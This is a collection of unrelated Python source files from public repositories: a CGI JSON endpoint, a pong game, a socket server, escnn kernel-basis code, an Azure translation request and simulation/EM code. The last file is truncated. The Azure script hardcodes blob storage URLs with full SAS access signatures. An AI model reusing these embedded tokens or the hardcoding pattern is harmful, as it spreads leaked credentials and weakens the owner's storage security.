\"pushTime\":\"20121202\",\n \"pushStatus\":\"0\",\n \"pushOperator\":\"1234\",\n \"pushNum\":\"12\",\n \"perPushNum\":\"12121\",\n \"perPushOpen\":\"12\"},\n {\n \"title\":\"测试2\",\n \"pushTime\":\"20121202\",\n \"pushStatus\":\"1\",\n \"pushOperator\":\"1234\",\n \"pushNum\":\"12\",\n \"perPushNum\":\"12121\",\n \"perPushOpen\":\"12\"},\n {\n \"title\":\"测试3\",\n \"pushTime\":\"20121202\",\n \"pushStatus\":\"1\",\n \"pushOperator\":\"1234\",\n \"pushNum\":\"12\",\n \"perPushNum\":\"12121\",\n \"perPushOpen\":\"12\"}]\n }]\n}\nerrorCode = {\"errorCode\":\"0\"}\njson = demjson.encode(data)\nprint('Accept: application/json, text/javascript, */*; q=0.01')\nprint('Content-Type: application/json')\nprint('Access-Control-Allow-Credentials: true')\nprint('Access-Control-Allow-Headers: accessToken,Content-Type')\nprint('Access-Control-Allow-Origin: http://localhost:63342' + '\\n')\nprint(json)","repo_name":"HanlaoTwo/SNOF","sub_path":"cgi-bin/getDatas.py","file_name":"getDatas.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32386392057","text":"\"\"\"\nWe've modified our base pong game to run an interactive where the viewers\ncontrol the paddle on the right. We handle all the control setup within our\nclient, but you can also design your controls in the Interactive Studio!\n\nYou should provide an OAuth token to connect to interactive on the comment line.\nYou can get this token by going to https://interactive.mixer.com/request\n\nPress 'q' to quit.\n\nRun this with::\n\n python -m examples.1_viewer_controlled.pong <ThatLongOAuthToken>\n\"\"\"\n\nfrom interactive_python import State, Button, keycode\nfrom sys import argv\n\nfrom ..engine import BaseGame, run\n\n\nclass Game(BaseGame):\n def __init__(self):\n super().__init__()\n self._player_1 = self._create_paddle(x=0, height=self._screen_height//6)\n self._player_2 = self._create_paddle(x=self._screen_width-1,\n height=self._screen_height//4)\n self._interactive = None\n\n async def setup(self):\n \"\"\"\n Called automatically by our game engine to boot the game. We'll create\n an interactive connection here! I've hard-coded a blank project to use.\n \"\"\"\n try:\n interactive = await State.connect(authorization=\"Bearer \" + argv[1],\n project_version_id=42489,\n project_sharecode='rheo1hre')\n except Exception as e:\n print(\"Error connecting to interactive\", e)\n return\n\n self._interactive = interactive\n interactive.on('error', lambda e: self.fatal_error(e))\n\n interactive.pump_async()\n await self._setup_controls()\n\n async def _setup_controls(self):\n \"\"\"\n All the control setup! Alternately, you can design the controls in\n the Interactive Studio, but we'll do them programmatically\n for demonstration purposes.\n \"\"\"\n up = Button(\n control_id='up',\n text='Up',\n keycode=keycode.up,\n position=[\n {'size': 'large', 'width': 5, 'height': 5, 'x': 0, 'y': 0},\n ],\n )\n\n up.on('mousedown', lambda call: self._player_2.move(-1))\n\n down = Button(\n control_id='down',\n text='Down',\n keycode=keycode.down,\n position=[\n {'size': 'large', 'width': 5, 'height': 5, 'x': 0, 'y': 6},\n ],\n )\n\n down.on('mousedown', lambda call: self._player_2.move(1))\n\n await self._interactive.scenes['default'].create_controls(up, down)\n await self._interactive.set_ready()\n\n def update(self, pressed_key=None):\n if pressed_key == ord('s'):\n self._player_1.move(1)\n elif pressed_key == ord('w'):\n self._player_1.move(-1)\n\n self._ball.step(self._player_1, self._player_2)\n\n\nrun(Game())\n","repo_name":"mixer/interactive-python","sub_path":"examples/1_viewer_controlled/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"92"} +{"seq_id":"72907619181","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport socket, time\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind(('', 8888))\nserver_socket.listen(5)\n\nwhile True:\n (client_socket, client_address) = server_socket.accept()\n data = client_socket.recv(4096)\n datetime = time.asctime() + '\\n'\n client_socket.send('Hello ' + data)\n client_socket.send('My time is ' + datetime)\n client_socket.close()\n","repo_name":"JackDrogon/CodingEveryday","sub_path":"archive/old_coding_everyday_20160408/week19/day74/networking/hello-server.py","file_name":"hello-server.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"32005073622","text":"import numpy as np\nfrom abc import ABC, abstractmethod\nfrom typing import List, Union, Tuple, Callable, Dict\n\nfrom .basis import KernelBasis, EmptyBasisException\nfrom .steerable_basis import SteerableKernelBasis\nfrom .spaces import PointRn\n\n__all__ = [\n 'GaussianRadialProfile',\n 'SphericalShellsBasis'\n]\n\ndef cart2pol(points):\n # computes the polar coordinates\n \n cumsum = np.sqrt(np.cumsum(points[::-1, :] ** 2, axis=0)[:0:-1, :])\n \n radii = cumsum[0, :]\n \n angles = np.arccos(points[:-1, :] / cumsum)\n \n mask = points[-1, :] < 0\n angles[-1, mask] = 2 * np.pi - angles[-1, mask]\n \n # the angle at the origin is not well defined\n angles[:, radii.reshape(-1) < 1e-9] = np.nan\n \n return radii, angles\n\n\ndef pol2cart(radii, angles):\n assert len(radii.shape) == 2\n assert len(angles.shape) == 2\n assert radii.shape[0] == 1\n assert angles.shape[0] > 0\n assert radii.shape[1] == angles.shape[1]\n \n points = np.empty((angles.shape[0] + 1, angles.shape[1]))\n \n mask = (radii > 1e-9).reshape(-1)\n points[:, ~mask] = 0.\n \n non_origin_count = mask.sum()\n cos = np.empty((angles.shape[0] + 1, non_origin_count))\n sin = np.empty((angles.shape[0] + 1, non_origin_count))\n \n cos[:-1, :] = np.cos(angles[:, mask])\n cos[-1, :] = 1.\n \n sin[1:, :] = np.sin(angles[:, mask])\n sin[0, :] = 1.\n sin = np.cumprod(sin, axis=0)\n \n points[:, mask] = cos * sin * radii[:, mask]\n \n return points\n\n\nclass GaussianRadialProfile(KernelBasis):\n \n def __init__(self, radii: List[float], sigma: Union[List[float], float]):\n r\"\"\"\n\n Basis for kernels defined over a radius in :math:`\\R^+_0`.\n\n Each basis element is defined as a Gaussian function.\n Different basis elements are centered at different radii (``rings``) and can possibly be associated with\n different widths (``sigma``).\n\n More precisely, the following basis is implemented:\n\n .. math::\n\n \\mathcal{B} = \\left\\{ b_i (r) := \\exp \\left( \\frac{ \\left( r - r_i \\right)^2}{2 \\sigma_i^2} \\right) \\right\\}_i\n\n In order to build a complete basis of kernels, you should combine this basis with a basis which defines the\n angular profile through :class:`~escnn.kernels.SphericalShellsBasis`.\n\n\n Args:\n radii (list): centers of each basis element. They should be different and spread to cover all\n domain of interest\n sigma (list or float): widths of each element. Can potentially be different.\n\n\n \"\"\"\n \n if isinstance(sigma, float):\n sigma = [sigma] * len(radii)\n \n assert len(radii) == len(sigma)\n assert isinstance(radii, list)\n \n for r in radii:\n assert r >= 0.\n \n for s in sigma:\n assert s > 0.\n \n super(GaussianRadialProfile, self).__init__(len(radii), (1, 1))\n \n self.radii = np.array(radii).reshape(1, 1, -1, 1)\n self.sigma = np.array(sigma).reshape(1, 1, -1, 1)\n \n def sample(self, radii: np.ndarray, out: np.ndarray = None) -> np.ndarray:\n r\"\"\"\n\n Sample the continuous basis elements on the discrete set of radii in ``radii``.\n Optionally, store the resulting multidimentional array in ``out``.\n\n ``radii`` must be an array of shape `(1, N)`, where `N` is the number of points.\n\n Args:\n radii (~numpy.ndarray): radii where to evaluate the basis elements\n out (~numpy.ndarray, optional): pre-existing array to use to store the output\n\n Returns:\n the sampled basis\n\n \"\"\"\n assert len(radii.shape) == 2\n assert radii.shape[0] == 1\n \n if out is None:\n out = np.empty((self.shape[0], self.shape[1], self.dim, radii.shape[1]))\n \n assert out.shape == (self.shape[0], self.shape[1], self.dim, radii.shape[1])\n \n radii = radii.reshape(1, 1, 1, -1)\n \n d = (self.radii - radii) ** 2\n \n out = np.exp(-0.5 * d / self.sigma ** 2, out=out)\n \n return out\n \n def __getitem__(self, r):\n assert r < self.dim\n return {\"radius\": self.radii[0, 0, r, 0], \"sigma\": self.sigma[0, 0, r, 0], \"idx\": r}\n \n def __eq__(self, other):\n if isinstance(other, GaussianRadialProfile):\n return np.allclose(self.radii, other.radii) and np.allclose(self.sigma, other.sigma)\n else:\n return False\n \n def __hash__(self):\n return hash(self.radii.tobytes()) + hash(self.sigma.tobytes())\n\n\nclass SphericalShellsBasis(KernelBasis):\n \n def __init__(self,\n n: int,\n angular: SteerableKernelBasis,\n radial: GaussianRadialProfile,\n filter: Callable[[Dict], bool] = None\n ):\n r\"\"\"\n\n Build the tensor product basis of a radial profile basis and an spherical profile basis for kernels over the\n Euclidean space :math:`\\R^n`.\n \n The kernel space is spanned by an independent basis for each shell.\n The kernel space over shells with positive radius is spanned the basis defined by the `angular` basis\n (an independent copy of each for each cell).\n The kernel over the shells with zero radius (the origin) is spanned by the `origin` basis.\n \n Given the bases :math:`O = \\{o_i\\}_i` for the origin, :math:`A = \\{a_j\\}_j` for the spherical shells and\n :math:`D = \\{d_r\\}_r` for the radial component (indexed by :math:`r \\geq 0`, the radius different rings),\n this basis is defined as\n\n .. math::\n C = \\left\\{c_{i,j}(\\bold{p}) := d_r(||\\bold{p}||) a_j(\\hat{\\bold{p}}) \\right\\}_{r>0, j} \\cup \\{d_0(||\\bold{p}||) o_i\\}_i\n\n where :math:`(||\\bold{p}||, \\hat{\\bold{p}})` are the polar coordinates of the point\n :math:`\\bold{p} \\in \\R^n`.\n \n Note that the basis on the origin is represented as a simple `np.ndarray` of 3 dimensions, where the last one\n indexes the basis elements as :math:`i` above.\n \n The radial component is parametrized using :class:`~escnn.kernels.GaussianRadialProfile`.\n \n\n Args:\n n (int): dimension of the Euclidean base space\n angular (SteerableKernelBasis): the angular basis\n radial (GaussianRadialProfile): the basis for the radial profile\n filter (callable, optional): function used to filter out some basis elements. It takes as input a dict\n describing a basis element and should return a boolean value indicating whether to keep (`True`) or\n discard (`False`) the element. By default (`None`), all basis elements are kept.\n\n Attributes:\n ~.radial (GaussianRadialProfile): the radial basis\n ~.angular (SteerableKernelBasis): the angular basis\n ~.origin (SteerableKernelBasis): the basis for the origin\n\n \"\"\"\n\n self.n = n\n self.radial = radial\n self.angular = angular\n \n # TODO - create singleton classes \"spaces\"\n # include Spheres S^d, points, lines, etc...\n # SpaceIsom should be a pair (HomSpace, Space)\n # the _is_point() method should belong to the space\n # here we should assert that the SpaceIsom is associated with the sphere S^{n-1}\n \n sphere = angular.X\n try:\n origin = SteerableKernelBasis(\n PointRn(self.n, sphere.G),\n angular.in_repr,\n angular.out_repr,\n angular._irrep_basis,\n # the origin contains only the frequency 0 harmonic\n harmonics=[sphere.zero_harmonic],\n **angular._irrep__basis_kwargs\n )\n except EmptyBasisException:\n origin = None\n\n if origin is not None:\n assert angular.shape == origin.shape[:2]\n assert angular.in_repr == origin.in_repr\n assert angular.out_repr == origin.out_repr\n assert angular.group == origin.group\n\n assert len(origin.js) == 1\n assert origin.js[0] == sphere.zero_harmonic\n assert origin.js[0] in angular.js\n assert (\n origin.dim_harmonic(sphere.zero_harmonic)\n ==\n angular.dim_harmonic(sphere.zero_harmonic)\n )\n assert origin.dim_harmonic(sphere.zero_harmonic) == origin.dim\n \n self.origin = origin\n\n if filter is not None:\n self._filter = np.zeros(len(self.angular) * len(self.radial), dtype=np.int)\n _idx_map = []\n i = 0\n for attr1 in self.radial:\n for attr2 in self.angular:\n attr = dict()\n attr.update(attr1)\n attr.update(attr2)\n \n if filter(attr):\n self._filter[i] = 1\n _idx_map.append(i)\n i += 1\n \n dim = int(self._filter.sum())\n self._idx_map = np.array(_idx_map)\n else:\n self._filter = None\n self._idx_map = None\n dim = len(self.angular) * len(self.radial)\n \n super(SphericalShellsBasis, self).__init__(dim, (radial.shape[0] * angular.shape[0], radial.shape[1] * angular.shape[1]))\n \n def sample(self, points: np.ndarray, out: np.ndarray = None) -> np.ndarray:\n r\"\"\"\n\n Sample the continuous basis elements on a discrete set of ``points`` in the space :math:`\\R^n`.\n Optionally, store the resulting multidimensional array in ``out``.\n\n ``points`` must be an array of shape `(n, N)` containing `N` points in the space.\n Note that the points are specified in cartesian coordinates :math:`(x, y, z, ...)`.\n\n Args:\n points (~numpy.ndarray): points in the n-dimensional Euclidean space where to evaluate the basis elements\n out (~numpy.ndarray, optional): pre-existing array to use to store the output\n\n Returns:\n the sampled basis\n\n \"\"\"\n assert len(points.shape) == 2\n assert points.shape[0] == self.n\n \n # computes the polar coordinates\n # radii, angles = cart2pol(points)\n \n radii = np.sqrt((points ** 2).sum(axis=0, keepdims=True))\n \n non_origin_mask = (radii > 1e-99).reshape(-1)\n sphere = points[:, non_origin_mask] / radii[:, non_origin_mask]\n origin = points[:, ~non_origin_mask]\n\n if out is None:\n out = np.empty((self.shape[0], self.shape[1], self.dim, points.shape[1]))\n \n assert out.shape == (self.shape[0], self.shape[1], self.dim, points.shape[1])\n \n # sample the radial basis\n o1 = self.radial.sample(radii)\n\n # sample the angular basis\n o2 = np.empty((self.shape[0], self.shape[1], self.angular.dim, points.shape[1]))\n o2.fill(np.nan)\n\n # where r>0, we sample all frequencies\n o2[..., non_origin_mask] = self.angular.sample(sphere)\n \n # only frequency 0 is sampled at the origin. Other frequencies are set to 0\n if self.origin is not None:\n o2[..., :self.origin.dim, ~non_origin_mask] = self.origin.sample(origin)\n o2[..., self.origin.dim:, ~non_origin_mask] = 0.\n else:\n o2[..., ~non_origin_mask] = 0.\n \n assert not np.isnan(o1).any()\n assert not np.isnan(o2[..., non_origin_mask]).any()\n assert not np.isnan(o2[..., ~non_origin_mask]).any()\n assert not np.isnan(o2).any()\n\n m, n, a, p = o1.shape\n q, r, b, p = o2.shape\n \n if self._filter is None:\n np.einsum(\"mnap,qrbp->mqnrabp\", o1, o2, out=out.reshape((m, q, n, r, a, b, p)))\n return out.reshape((q * m, n * r, self.dim, p))\n else:\n out[:] = np.einsum(\"mnap,qrb->mqnrabp\", o1, o2).reshape((m * q, n * r, a * b, p))[..., self._filter, :]\n return out\n \n def __getitem__(self, idx):\n assert idx < self.dim\n \n if self._idx_map is None:\n _idx = idx\n else:\n _idx = self._idx_map[idx]\n \n idx1, idx2 = divmod(_idx, self.angular.dim)\n attr1 = self.radial[idx1]\n attr2 = self.angular[idx2]\n \n assert attr1[\"idx\"] == idx1\n assert attr2[\"idx\"] == idx2\n\n attr = dict()\n attr.update(attr1)\n attr.update(attr2)\n\n attr[\"idx\"] = idx\n attr[\"idx1\"] = attr1[\"idx\"]\n attr[\"idx2\"] = attr2[\"idx\"]\n\n return attr\n\n def __iter__(self):\n idx = 0\n i = 0\n\n # since this methods return iterables of attributes built on the fly, load all attributes first and then\n # iterate on these lists\n radial_attrs = list(self.radial)\n angular_attrs = list(self.angular)\n\n for idx1, attr1 in enumerate(radial_attrs):\n for idx2, attr2 in enumerate(angular_attrs):\n if self._filter is None or self._filter[i] == 1:\n \n assert attr1[\"idx\"] == idx1\n assert attr2[\"idx\"] == idx2\n \n attr = dict()\n attr.update(attr1)\n attr.update(attr2)\n attr[\"idx1\"] = attr1[\"idx\"]\n attr[\"idx2\"] = attr2[\"idx\"]\n attr[\"idx\"] = idx\n\n yield attr\n idx += 1\n i += 1\n \n def __eq__(self, other):\n if isinstance(other, SphericalShellsBasis):\n return (\n self.n == other.n and\n self.radial == other.radial and\n self.angular == other.angular and\n self.origin == other.origin and\n self._filter == other._filter\n )\n else:\n return False\n \n def __hash__(self):\n return self.n + hash(self.radial) + hash(self.angular) + hash(self.origin) + hash(self._filter)\n\n\nif __name__ == \"__main__\":\n \n for _ in range(100):\n for n in range(2, 6):\n x = np.random.randn(n, 4)\n \n radii, angles = cart2pol(x)\n y = pol2cart(radii, angles)\n \n print(x)\n print(radii)\n print(angles)\n print(y)\n assert np.allclose(x, y)\n","repo_name":"hai-h-nguyen/equi-rl-for-pomdps","sub_path":"escnn/escnn/kernels/polar_basis.py","file_name":"polar_basis.py","file_ext":"py","file_size_in_byte":14602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"17518288610","text":"import requests, infos\n\n# Endpoint of your translator Service on Azure\nendpoint = \"https://mdtranslator25.cognitiveservices.azure.com/translator/text/batch/v1.0-preview.1\"\nsubscriptionKey = infos.subscriptionKey # Add your subscription key here!\npath = '/batches'\nconstructed_url = endpoint + path\n\npayload= {\n \"inputs\": [\n {\n \"source\": {\n \"sourceUrl\": \"https://mdsourcedocs.blob.core.windows.net/demo1?sv=2020-04-08&st=2021-05-18T15%3A32%3A05Z&se=2021-05-28T15%3A32%3A00Z&sr=c&sp=rl&sig=6cA7hWg%2F63Jyq6xur8qrySewhV1pSaJ4ds%2Bbj2u3klo%3D\",\n # Storage ource of the document \n \"storageSource\": \"AzureBlob\",\n \"language\": \"en\",\n \"filter\":{\n #\"prefix\": \"Demo_1/\"\n }\n },\n \"targets\": [\n {\n \"targetUrl\": \"https://mdtargetdocs.blob.core.windows.net/demo1?sv=2020-04-08&st=2021-05-18T15%3A34%3A57Z&se=2021-05-28T15%3A34%3A00Z&sr=c&sp=wl&sig=RPhBNbnmEM%2BS16cZVwnG3v6t46lZv4wm0%2BlaIeXb%2B60%3D\",\n #Target Storage for the translated document\n \"storageSource\": \"AzureBlob\",\n \"category\": \"general\",\n \"language\": \"es\"\n }\n ]\n }\n ]\n}\nheaders = {\n 'Ocp-Apim-Subscription-Key': subscriptionKey,\n 'Content-Type': 'application/json'\n}\n\nresponse = requests.post(constructed_url, headers=headers, json=payload)\n\nprint(f'response status code: {response.status_code}\\nresponse status: {response.reason}\\nresponse headers: {response.headers}')","repo_name":"mddiallo/cognitive-service-translate","sub_path":"docs_translate.py","file_name":"docs_translate.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70472769260","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 3 11:19:44 2019\r\n\r\n@author: Jerry\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nfrom GRN import DynamicModel,Recoder,MonteCarloSimulator\r\n\r\nN = 2000\r\nalpha = 1\r\navgDegree = 3\r\ngamma = 0.7\r\nlimitedRegimePatNum = 6\r\ndenseRegimeExpRate = 0.3\r\ntemperature = 0.00\r\ntotalSteps = 50\r\nbinDist = 100\r\nnumSim = 100\r\nregimes_P = ['saturated','sub_extensive','limited']\r\nregimes_C = ['sparse','extreme_dilution','dense']\r\nfigFile = r'E:\\KCL\\FinalProject\\figures/'\r\n\r\nconfig = tf.ConfigProto()\r\nconfig.gpu_options.allow_growth=True\r\nconfig.gpu_options.allocator_type = 'BFC'\r\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.95\r\n\r\ndm = DynamicModel(temperature,\r\n N,\r\n avgDegree,\r\n alpha,\r\n ifDeco=False,\r\n tfConfig=config,\r\n gamma=gamma,\r\n withExt=True)\r\ndm1 = DynamicModel(temperature,\r\n N,\r\n avgDegree,\r\n alpha,\r\n ifDeco=False,\r\n tfConfig=config,\r\n gamma=gamma,\r\n withExt=False)\r\nre = Recoder(dm,totalSteps,binDist,ifSync=False)\r\nmulti_overlap_observation = Recoder.multi_observation(55)(Recoder.hamming_overlap)\r\n\r\nfor reg_p in regimes_P:\r\n for reg_c in regimes_C:\r\n if reg_p is not 'limited':\r\n dm.regime_P(reg_p)\r\n else:\r\n dm.regime_P(reg_p,limitedRegimePatNum)\r\n \r\n if reg_c is not 'dense':\r\n dm.regime_C(reg_c)\r\n else:\r\n dm.regime_C(reg_c,denseRegimeExpRate)\r\n\r\n dm._init_memMat()\r\n print(\"now is in \"+reg_p+\" and \"+reg_c+\" regime...\")\r\n\r\n multi_overlap_observation(re)\r\n\r\n re.plot()\r\n figName = 'distanceMatrix_'+reg_p+'_'+reg_c+'.png'\r\n re.fig.savefig(figFile+figName)\r\n print(\"Exiting current regime...\")","repo_name":"BigJerry/GRN","sub_path":"alpha_c_trials_2.py","file_name":"alpha_c_trials_2.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74198652779","text":"from pykalman import KalmanFilter\nimport pykalman.standard as filtermethods\nimport numpy as np\nimport scipy as sp\nfrom scipy.special import logsumexp\nfrom scipy.stats import multivariate_normal\n\n\nclass LDSMixture:\n def __init__(self):\n \"\"\"\n transition_matrix:predicts state at time t from state at t-1\n transition_covariance: covariance matrix for state\n observation_matrix: transforms state into observation\n observation_covariance: covariance matrix for observation\n initial_state_means, initial_state_covariances: parameterize\n initial state distribution for each trajectory\n \"\"\"\n self.transition_matrix = None\n self.transition_covariances = None\n\n self.observation_matrix = None\n self.observation_covariances = None\n\n self.initial_state_means = None\n self.initial_state_covariances = None\n\n self.responsibilities = None\n\n self.state_means = None\n self.state_covariances = None\n self.pairwise_covariances = None\n\n self.component_weights = None\n\n self.K = None # number of mixture components\n self.U = None # observation dimensionality\n self.V = None # state dimensionality\n self.T = None # timepoints\n\n # evidence lower bound = expected complete log likelihood + entropy\n self.lower_bound = None\n\n # expected complete log likelihood E[logP(X, Y, Z | parameters)]\n self.expected_likelihoods = None\n\n # negative expected log likelihood of latent variable distributions\n self.entropies = None\n\n def initialize(self, data, K, U, V, T, process_noise, observation_noise):\n \"\"\"\n Initialize the model\n we need all the model parameters plus initial responsibilities or\n initial states and covariances\n\n This isn't a very thoughtful initialization but the rest of the code\n should work regardless given this information.\n \"\"\"\n self.K = K\n self.U = U\n self.V = V\n self.T = T\n N = data.shape[0]\n\n self.transition_matrix = np.array([[1]])\n transition_covariance = np.array([[process_noise**2]])\n self.transition_covariances = np.array([transition_covariance] * K)\n\n self.observation_matrix = np.array([[1]])\n self.observation_covariance = np.array([[observation_noise**2]])\n\n self.initial_state_means = np.zeros(K)\n self.initial_state_covariance = np.array([[1]])\n\n self.initial_state_means = np.zeros(K)\n initial_state_covariance = np.array([[1]])\n self.initial_state_covariances = \\\n np.array([initial_state_covariance] * K)\n\n responsibilities = np.random.rand(N, K)\n responsibilities = \\\n responsibilities / responsibilities.sum(axis=1)[:, np.newaxis]\n self.responsibilities = responsibilities\n\n self.component_weights = np.ones(K) / K\n\n self.state_means = np.empty((K, T, U))\n self.state_covariances = np.empty((K, T, V, V))\n self.pairwise_covariances = np.empty((K, T, V, V))\n\n def em(self, data, threshold=1e-3, iter_max=1000):\n \"\"\"\n perform em\n does variational inference over hidden states in e step\n updates model parameters given hidden state distributions in m step\n \"\"\"\n elbos = []\n for i in range(iter_max):\n elbos.extend(self.estep(data))\n elbos.append(self.mstep(data)[0])\n elbo_diff = elbos[-1] - elbos[-2]\n if elbo_diff < threshold:\n break\n\n def mstep(self, data):\n \"\"\"\n mstep updated model parameters:\n component_weights\n observation covariance, shared across clusters\n transition_covariance, unique to each trajectory\n initial state distributions for each trajectory\n \"\"\"\n K = self.K\n V = self.V\n\n # compute updated parameters\n component_weights = _update_component_weights(\n responsibilities=self.responsibilities\n )\n\n observation_covariance = _update_observation_covariance(\n data=data,\n state_means=self.state_means,\n state_covariances=self.state_covariances,\n responsibilities=self.responsibilities\n )\n\n transition_covariances = np.empty((K, V, V))\n for k in range(K):\n transition_covariances[k] = _update_transition_covariances(\n transition_matrix=self.transition_matrix,\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n initial_state_means = _update_initial_state_means(\n state_means=self.state_means\n )\n\n initial_state_covariances = np.zeros((K, V, V))\n for k in range(K):\n initial_state_covariances[k] = _update_initial_state_covariance(\n initial_state_mean=self.initial_state_means[k],\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n )\n\n # update object attributes with new parameter estimates\n self.component_weights = component_weights\n self.observation_covariance = observation_covariance\n self.transition_covariances = transition_covariances\n self.initial_state_means = initial_state_means\n self.initial_state_covariances = initial_state_covariances\n\n return self.elbo(data)\n\n def update_component_weights(self):\n \"\"\"\n update component weights\n \"\"\"\n self.component_weights = _update_component_weights(\n responsibilities=self.responsibilities\n )\n\n def update_observation_covariance(self, data):\n \"\"\"\n update observation weights\n \"\"\"\n self.observation_covariance = _update_observation_covariance(\n data=data,\n state_means=self.state_means,\n state_covariances=self.state_covariances,\n responsibilities=self.responsibilities\n )\n\n def update_transition_covariances(self):\n \"\"\"\n update transition covariances for each trajectory\n \"\"\"\n K = self.K\n V = self.V\n transition_covariances = np.empty((K, V, V))\n for k in range(K):\n transition_covariances[k] = _update_transition_covariances(\n transition_matrix=self.transition_matrix,\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n self.transition_covariances = transition_covariances\n\n def update_initial_state_means(self):\n \"\"\"\n update initial state means\n \"\"\"\n self.initial_state_means = self.state_means[:, 0]\n\n def update_initial_state_covariances(self):\n \"\"\"\n update initial state covariances\n \"\"\"\n K = self.K\n V = self.V\n\n initial_state_covariances = np.zeros((K, V, V))\n for k in range(K):\n initial_state_covariances[k] = _update_initial_state_covariance(\n initial_state_mean=self.initial_state_means[k],\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n )\n self.initial_state_covariances = initial_state_covariances\n\n def estep(self, data, threshold=1e-5, iter_max=1000, show_training=False):\n \"\"\"\n data: samples x timepoints matrix of data\n threshold: covergence threshold for variational inference\n iter_max: maximum number of iterations for variational inference\n show training: if true print change in evidence lower bound at\n each iteration\n \"\"\"\n elbos = []\n\n for i in range(iter_max):\n self._estimate_states(data)\n self._estimate_responsibilities(data)\n elbos.append(self.elbo(data))\n\n if i >= 1:\n elbo_diff = elbos[-1] - elbos[-2]\n if show_training:\n print(elbo_diff)\n assert(elbo_diff >= 0)\n if elbo_diff < threshold:\n break\n\n return elbos\n\n def _estep(self, data):\n \"\"\"\n one iteration of variational inference for e step\n \"\"\"\n self._estimate_responsibilities(data)\n self._estimate_states(data)\n\n return self.elbo(data)\n\n def _estimate_responsibilities(self, data):\n \"\"\"\n estimate posterior assignment probabilities given state estimates\n \"\"\"\n arguments = {\n 'state_means': self.state_means,\n 'state_covariances': self.state_covariances,\n 'observation_covariance': self.observation_covariance,\n 'component_weights': self.component_weights\n }\n\n expected_conditional_likelihoods = np.array(list(map(\n lambda obs: _expected_conditional_likelihoods(obs, **arguments),\n data\n )))\n\n responsibilities = np.array(list(map(\n _responsibilities_update, expected_conditional_likelihoods\n )))\n\n self.responsibilities = responsibilities\n\n def _filter_and_smooth(self, f, included, data):\n \"\"\"\n f: kalman filter object\n included: boolean array indicating which\n data points have non-zero assignment probability\n data: data to estimate states on\n\n kalman filtering step, estimates distribution over state sequence\n given all of the data. relies on kalman filter package pykalman\n \"\"\"\n # estimate states\n if f is not None:\n # f is none when no observations areassigned to it\n Z = f._parse_observations(data[included].T)\n\n (transition_matrices, transition_offsets,\n transition_covariance, observation_matrices,\n observation_offsets, observation_covariance,\n initial_state_mean, initial_state_covariance) = (\n f._initialize_parameters()\n )\n\n (predicted_state_means, predicted_state_covariances,\n _, filtered_state_means, filtered_state_covariances) = (\n filtermethods._filter(\n transition_matrices, observation_matrices,\n transition_covariance, observation_covariance,\n transition_offsets, observation_offsets,\n initial_state_mean, initial_state_covariance, Z\n )\n )\n\n (smoothed_state_means, smoothed_state_covariances,\n kalman_smoothing_gains) = (\n filtermethods._smooth(\n transition_matrices, filtered_state_means,\n filtered_state_covariances, predicted_state_means,\n predicted_state_covariances\n )\n )\n\n pairwise_covariances = filtermethods._smooth_pair(\n smoothed_state_covariances,\n kalman_smoothing_gains\n )\n\n state_means = smoothed_state_means\n state_covariances = smoothed_state_covariances\n pairwise_covariances = pairwise_covariances\n\n else:\n # no observations are assigned, this cluster isn't being used\n state_means = None\n state_covariances = None\n pairwise_covariances = None\n\n return state_means, state_covariances, pairwise_covariances\n\n def _estimate_states(self, data):\n \"\"\"\n estimates state sequences for all trajectories/clusters\n \"\"\"\n K = self.K\n\n # set up filters\n filters = [\n _initialize_filter(\n transition_matrix=self.transition_matrix,\n observation_matrix=self.observation_matrix,\n transition_covariance=self.transition_covariances[k],\n observation_covariance=self.observation_covariance,\n initial_state_mean=self.initial_state_means[k],\n initial_state_covariance=self.initial_state_covariance,\n responsibilities=self.responsibilities[:, k]\n )\n for k in range(K)\n ]\n\n # estimate state distributions\n for k in range(K):\n f, included = filters[k]\n means, covariances, pairwise_covariances = \\\n self._filter_and_smooth(f, included, data)\n\n if means is not None:\n # if we actually got new state estimates update\n # model attributes\n self.state_means[k] = means\n self.state_covariances[k] = covariances\n self.pairwise_covariances[k] = pairwise_covariances\n\n def elbo(self, data):\n \"\"\"\n computed the evidence lower bound of the data\n returns float: evidence lower bound of data\n \"\"\"\n K = self.K\n N = data.shape[0] # number of observations\n\n entropies = np.zeros(N + K)\n expected_likelihoods = np.zeros(N + K)\n\n for j, observation in enumerate(data):\n expected_likelihoods[j] = _expected_observation_likelihood(\n observation=observation,\n responsibilities=self.responsibilities[j],\n state_means=self.state_means,\n state_covariances=self.state_covariances,\n observation_covariance=self.observation_covariance,\n component_weights=self.component_weights\n )\n\n for j, observation in enumerate(data):\n entropies[j] = \\\n _assignment_entropy(responsibilities=self.responsibilities[j])\n\n for k in range(K):\n expected_likelihoods[N + k] = _expected_sequence_likelihood(\n initial_state_mean=self.initial_state_means[k],\n initial_state_covariance=self.initial_state_covariances[k],\n transition_covariance=self.transition_covariances[k],\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n entropies[N + k] = _state_sequence_entropy(\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n seperate_elbos = expected_likelihoods + 